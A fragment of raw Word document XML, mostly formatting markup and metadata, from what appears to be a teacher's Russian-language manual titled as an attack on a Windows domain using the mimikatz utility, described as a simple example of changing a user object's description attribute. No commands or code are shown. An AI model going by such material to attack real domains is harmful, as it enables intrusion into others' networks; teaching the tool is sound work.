          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Gon</w:t>
      </w:r>
      <w:r w:rsidR="00C45B34">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45B34" w:rsidRPr="00C45B34" w:rsidRDefault="00C45B34" w:rsidP="00C45B3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758180" cy="5856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85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5B34" w:rsidRPr="00C45B34" w:rsidSect="0061570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A4"/>
    <w:rsid w:val="00347194"/>
    <w:rsid w:val="004B4A48"/>
    <w:rsid w:val="00615706"/>
    <w:rsid w:val="00782DA4"/>
    <w:rsid w:val="00AD6368"/>
    <w:rsid w:val="00AD7605"/>
    <w:rsid w:val="00BB5D6A"/>
    <w:rsid w:val="00C45B34"/>
    <w:rsid w:val="00D0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84CA5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CE1C354C-071A-4A9A-BF67-A79424B0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570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61570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61570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615706"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman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В этом мануале рассмотрен будет простой пример работы с утилитой mimikatz, а именно, изменение атрибута description у объекта пользователя.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Атака на домен с использованием утилиты mimikatz</dc:title>
  <dc:subject>Автор: Скрыльников Вячеслав Владимирович</dc:subject>
  <dc:creator>Teacher</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Teacher</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-15T16:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-15T17:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>